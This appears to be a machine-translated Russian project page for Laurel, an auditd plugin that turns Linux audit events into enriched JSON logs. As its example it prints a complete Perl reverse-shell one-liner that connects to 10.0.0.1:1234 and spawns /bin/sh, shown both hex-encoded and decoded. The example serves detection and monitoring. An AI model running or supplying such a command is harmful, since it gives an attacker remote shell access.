laurel
v0.6.4
Laurel-это плагин после обработки событий для Auditd (8) , который генерирует полезные, обогащенные журналы аудита на основе JSON, подходящие для современного настройки мониторинга безопасности.
Документация, соответствующая последнему стабильному выпуску, можно найти здесь.
TLDR: вместо аудиторских событий, которые выглядят так ...
type=EXECVE msg=audit(1626611363.720:348501): argc=3 a0="perl" a1="-e" a2=75736520536F636B65743B24693D2231302E302E302E31223B24703D313233343B736F636B65742…
… Лорел превращает их в журналы JSON, где беспорядок, который нападающие/тестеры проникновения/Красные команды пытаются сделать, становится очевидным на первый взгляд:
{ … "EXECVE":{ "argc": 3,"ARGV": ["perl", "-e", "use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};"]}, …}
Это происходит в источнике, потому что Лорел работает на хосте, где генерируются события аудита. События обогащены полезной информацией о родительском процессе (PPID):
"PPID":{"EVENT_ID":"1643635026.276:327308","comm":"sh","exe":"/usr/bin/dash","ppid":3190631}
Конфигурация и детали работы описаны на странице ручной работы Laurel (8). Подробности о формате журнала и обоснованиях можно найти на странице ручной работы Laurel-a About (7). Страница Laurel-Audit-Rules (7) содержит советы и примеры для настройки правил аудита, полезных для обнаружения тактики злоумышленников.
Инструкции по установке Laurel содержат инструкции о том, как построить Laruel из Source и как его установить и настроить.
Мы разработали Лорел, потому что мы не были довольны наборами функций и характеристиками производительности существующих проектов и продуктов. Пожалуйста, обратитесь к документу Performance для получения подробной информации.
GNU General Public License, версия 3
Логотип был создан Birgit Meyer <[email protected]>.
